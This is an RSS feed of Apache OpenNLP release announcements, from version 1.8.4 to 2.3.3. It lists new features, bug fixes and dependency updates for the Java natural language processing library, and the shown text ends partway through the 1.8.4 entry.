| <?xml version="1.0"?> |
| <!-- |
| Licensed to the Apache Software Foundation (ASF) under one |
| or more contributor license agreements. See the NOTICE file |
| distributed with this work for additional information |
| regarding copyright ownership. The ASF licenses this file |
| to you under the Apache License, Version 2.0 (the |
| "License"); you may not use this file except in compliance |
| with the License. You may obtain a copy of the License at |
| |
| http://www.apache.org/licenses/LICENSE-2.0 |
| |
| Unless required by applicable law or agreed to in writing, |
| software distributed under the License is distributed on an |
| "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY |
| KIND, either express or implied. See the License for the |
| specific language governing permissions and limitations |
| under the License. |
| --> |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> |
| <channel> |
| <title>Apache OpenNLP</title> |
| <link>https://opennlp.apache.org</link> |
| <atom:link href="https://opennlp.apache.org/feed.xml" rel="self" type="application/rss+xml" /> |
| <description>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text</description> |
| <language>en-us</language> |
| <pubDate>Thu, 25 Apr 2024 08:23:31 +0000</pubDate> |
| <lastBuildDate>Thu, 25 Apr 2024 08:23:31 +0000</lastBuildDate> |
| |
| <item> |
| <title>Apache OpenNLP 2.3.3 released</title> |
| <link>https://opennlp.apache.org/news/release-233.html</link> |
| <pubDate>Thu, 25 Apr 2024 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-233.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.3.3.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.3.3 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_3_3">What&#8217;s new in Apache OpenNLP 2.3.3</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release brings four dependency updates, two bug fixes, minor corrections in the manual, and working integration tests (IT) again! |
| The ITs were not executed for quite some time, but are now executed for every regular Maven build.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP manual&#8217;s CSS got modernized. Moreover, this release will ship an abbreviation dictionary for the Dutch language.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list of improvements, please see the full list found in <a href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311215&amp;version=12354199">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.3.2 released</title> |
| <link>https://opennlp.apache.org/news/release-232.html</link> |
| <pubDate>Sun, 4 Feb 2024 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-232.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.3.2.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.3.2 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_3_2">What&#8217;s new in Apache OpenNLP 2.3.2</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>In this release we fixed several bugs and upgraded some dependencies. In addition, we added abbreviation dictionaries for several languages. |
| Moreover, we addressed a memory issue (OPENNLP-421) which occurs for large dictionaries due to String interning. Several new configuration |
| options have been added to choose a strategy. Details can be found in the related Jira / PR.</p> |
| </div> |
| <div class="paragraph"> |
| <p>We switched the default onnx runtime dependency in opennlp-dl to the cpu variant. If you need to use the GPU accelerated version of onxx, |
| you can use the newly added module opennlp-dl-gpu. Moreover, we fixed the CLI on the Windows plattform.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list of improvements, please see the list of items addressed in <a href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311215&amp;version=12353945">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.3.1 released</title> |
| <link>https://opennlp.apache.org/news/release-231.html</link> |
| <pubDate>Wed, 22 Nov 2023 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-231.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.3.1.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.3.1 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_3_1">What&#8217;s new in Apache OpenNLP 2.3.1</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>It is a maintenance release which mainly provides enhancements. Some of these are related to sentences models and the use of abbreviations. |
| Moreover, it switches the ONNX runtime for the 'opennlp-dl' component from the GPU to the CPU-based variant. Several other (cleanup) tasks have also been completed.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list of improvements, please see the list of items addressed in <a href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311215&amp;version=12353478">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.3.0 released</title> |
| <link>https://opennlp.apache.org/news/release-230.html</link> |
| <pubDate>Mon, 31 Jul 2023 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-230.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.3.0.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.3.0 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_3_0">What&#8217;s new in Apache OpenNLP 2.3.0</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>It is a maintenance release with dependency upgrades, removal of deprecated methods, and bug fixes. It also raises the minimum Java version to 17.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list please see the list of items addressed in <a href="https://issues.apache.org/jira/browse/OPENNLP-1483?jql=project%20%3D%20OPENNLP%20AND%20status%20in%20(Resolved%2C%20Closed)%20AND%20fixVersion%20%3D%202.3.0">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.2.0 released</title> |
| <link>https://opennlp.apache.org/news/release-220.html</link> |
| <pubDate>Sat, 22 Apr 2023 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-220.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.2.0.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.2.0 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_2_0">What&#8217;s new in Apache OpenNLP 2.2.0</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This version contains improvements to logging by introducing SLF4J to replace logging using System.out. ONNX Runtime support for sentence-transformers was also introduced. This version also includes fixes for stemming, documentation, and unit tests.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list please see the list of items addressed in <a href="https://issues.apache.org/jira/browse/OPENNLP-1483?jql=project%20%3D%20OPENNLP%20AND%20status%20in%20(Resolved%2C%20Closed)%20AND%20fixVersion%20%3D%202.2.0">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.1.1 released</title> |
| <link>https://opennlp.apache.org/news/release-211.html</link> |
| <pubDate>Thu, 23 Feb 2023 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-211.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.1.1.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.1.1 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_1_1">What&#8217;s new in Apache OpenNLP 2.1.1</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This version contains improvements to unit tests, code quality, JavaDocs, and a few minor fixes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list please see the list of items addressed in <a href="https://issues.apache.org/jira/browse/OPENNLP-1370?jql=project%20%3D%20OPENNLP%20AND%20status%20in%20(Resolved%2C%20Closed)%20AND%20fixVersion%20in%20(2.1.1)%20ORDER%20BY%20priority%20DESC%2C%20updated%20DESC">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.1.0 released</title> |
| <link>https://opennlp.apache.org/news/release-210.html</link> |
| <pubDate>Wed, 23 Nov 2022 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-210.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.1.0.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.1.0 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_1_0">What&#8217;s new in Apache OpenNLP 2.1.0</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Update language codes in documentation</p> |
| </li> |
| <li> |
| <p>Enable optional GPU inference in ONNX Runtime configuration</p> |
| </li> |
| <li> |
| <p>Allow for unlimited text length in document classification with ONNX Runtime</p> |
| </li> |
| <li> |
| <p>Fix alphaNumOpt in tokenizer example</p> |
| </li> |
| <li> |
| <p>Training of MaxEnt model with large corpora fails with java.io.UTFDataFormatException</p> |
| </li> |
| <li> |
| <p>Make parameter names in the params file be not case-sensitive</p> |
| </li> |
| <li> |
| <p>Upgrade JUnit to version 5</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>For a full list please see the list of items addressed in <a href="https://issues.apache.org/jira/browse/OPENNLP-1370?jql=project%20%3D%20OPENNLP%20AND%20status%20in%20(Resolved%2C%20Closed)%20AND%20fixVersion%20in%20(2.1.0)%20ORDER%20BY%20priority%20DESC%2C%20updated%20DESC">Jira</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 2.0.0 released</title> |
| <link>https://opennlp.apache.org/news/release-200.html</link> |
| <pubDate>Sun, 5 Jun 2022 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-200.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 2.0.0.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 2.0.0 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_2_0_0">What&#8217;s new in Apache OpenNLP 2.0.0</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Adds ability to download models from within Apache OpenNLP</p> |
| </li> |
| <li> |
| <p>Now builds using Java 11</p> |
| </li> |
| <li> |
| <p>Supports model inference using the ONNX Runtime</p> |
| </li> |
| <li> |
| <p>Adds MASC format support</p> |
| </li> |
| <li> |
| <p>Made NameSample overlap exception more helpful</p> |
| </li> |
| <li> |
| <p>Tokenizers can now output a new line token</p> |
| </li> |
| <li> |
| <p>Adding missing charset to DictionaryLemmatizer</p> |
| </li> |
| <li> |
| <p>Updated documentation to fix training API sample code</p> |
| </li> |
| <li> |
| <p>Fixed build issues with Java 17</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the <em>README.html</em> file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.9.4 released</title> |
| <link>https://opennlp.apache.org/news/release-194.html</link> |
| <pubDate>Wed, 3 Nov 2021 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-194.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.9.4.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.9.4 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_9_4">What&#8217;s new in Apache OpenNLP 1.9.4</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Refactorings to improve code quality and performance.</p> |
| </li> |
| <li> |
| <p>Fix Parser top k parses doesn&#8217;t show "top" (highest probability) parses.</p> |
| </li> |
| <li> |
| <p>Use LinkedHashMap for deterministic iteration order.</p> |
| </li> |
| <li> |
| <p>Fixed spelling errors in the documentation.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>OpenNLP Pre-trained Models Available</title> |
| <link>https://opennlp.apache.org/news/news-2021-05-30.html</link> |
| <pubDate>Sun, 30 May 2021 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/news-2021-05-30.html</guid> |
| <description> |
| <div class="sect1"> |
| <h2 id="opennlp_pre_trained_models_available">OpenNLP Pre-trained Models Available</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>Pre-trained sentence, parts of speech, and token models are now available for English, French, Italian, German, and Dutch. |
| These models were trained on Universal Dependencies and are intended to provide usable models under the Apache 2.0 license. |
| See the models' README for more information on the models including how each was created and evaluated.</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.9.3 released</title> |
| <link>https://opennlp.apache.org/news/release-193.html</link> |
| <pubDate>Fri, 31 Jul 2020 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-193.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.9.3.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.9.3 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_9_3">What&#8217;s new in Apache OpenNLP 1.9.3</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Resolved issues building on Java 11.</p> |
| </li> |
| <li> |
| <p>Using strict math for calculations for consistent evaluations.</p> |
| </li> |
| <li> |
| <p>Implement Serializable in langdetect and normalize.</p> |
| </li> |
| <li> |
| <p>Fixed issue where language detector fails to predict language on long input texts.</p> |
| </li> |
| <li> |
| <p>Documentation improvements.</p> |
| </li> |
| <li> |
| <p>Add support for Catalan and Indonesian stemmers.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.9.2 released</title> |
| <link>https://opennlp.apache.org/news/release-192.html</link> |
| <pubDate>Thu, 26 Dec 2019 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-192.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.9.2.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.9.2 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_9_2">What&#8217;s new in Apache OpenNLP 1.9.2</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Add SHA-512 checksum files for artifacts.</p> |
| </li> |
| <li> |
| <p>LanguageDetectorEvaluatorTest failure in Windows.</p> |
| </li> |
| <li> |
| <p>Build Warnings due to deprecated pom.version.</p> |
| </li> |
| <li> |
| <p>Add support for Arabic and Greek stemmers.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.9.1 released</title> |
| <link>https://opennlp.apache.org/news/release-191.html</link> |
| <pubDate>Mon, 31 Dec 2018 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-191.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.9.1.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.9.1 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_9_1">What&#8217;s new in Apache OpenNLP 1.9.1</h2> |
| <div class="sectionbody"> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Add TrigramNameFeatureGeneratorFactory</p> |
| </li> |
| <li> |
| <p>Documentation updates.</p> |
| </li> |
| <li> |
| <p>Unit test improvements.</p> |
| </li> |
| <li> |
| <p>TokenFeatureGeneratorFactory now allows to set lowercase flag.</p> |
| </li> |
| <li> |
| <p>Use ja for Japanese language code rather than jp.</p> |
| </li> |
| <li> |
| <p>Use hash to avoid linear search in DefaultEndOfSentenceScanner.</p> |
| </li> |
| <li> |
| <p>Opennlp allows setting the heap size.</p> |
| </li> |
| <li> |
| <p>Builds with Java 11.</p> |
| </li> |
| <li> |
| <p>Use daemon threads in executor services.</p> |
| </li> |
| <li> |
| <p>Allow for iterating through word vector table tokens.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.9.0 released</title> |
| <link>https://opennlp.apache.org/news/release-190.html</link> |
| <pubDate>Mon, 2 Jul 2018 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-190.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.9.0.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.9.0 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_9_0">What&#8217;s new in Apache OpenNLP 1.9.0</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces new features, improvements and bug fixes. Java 1.8 and Maven 3.3.9 are required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Brat Document Parser should support name type filters</p> |
| </li> |
| <li> |
| <p>Brat format support fails on multi fragment annotations</p> |
| </li> |
| <li> |
| <p>Remove MD5 hashes from Release process</p> |
| </li> |
| <li> |
| <p>Use String[] instead of StringList in LanguageModel API</p> |
| </li> |
| <li> |
| <p>BRAT Annotator service Fails to start</p> |
| </li> |
| <li> |
| <p>Token model creation fails without at least one &lt;SPLIT&gt; tag</p> |
| </li> |
| <li> |
| <p>Update Penn Treebank URL</p> |
| </li> |
| <li> |
| <p>Explain the new format of feature generator XML config</p> |
| </li> |
| <li> |
| <p>Unify code to sum up input context features</p> |
| </li> |
| <li> |
| <p>FeatureGeneratorUtil can recognize Japanese Hiragana and Katakana letters</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.8.4 released</title> |
| <link>https://opennlp.apache.org/news/release-184.html</link> |
| <pubDate>Sun, 24 Dec 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-184.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.8.4.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
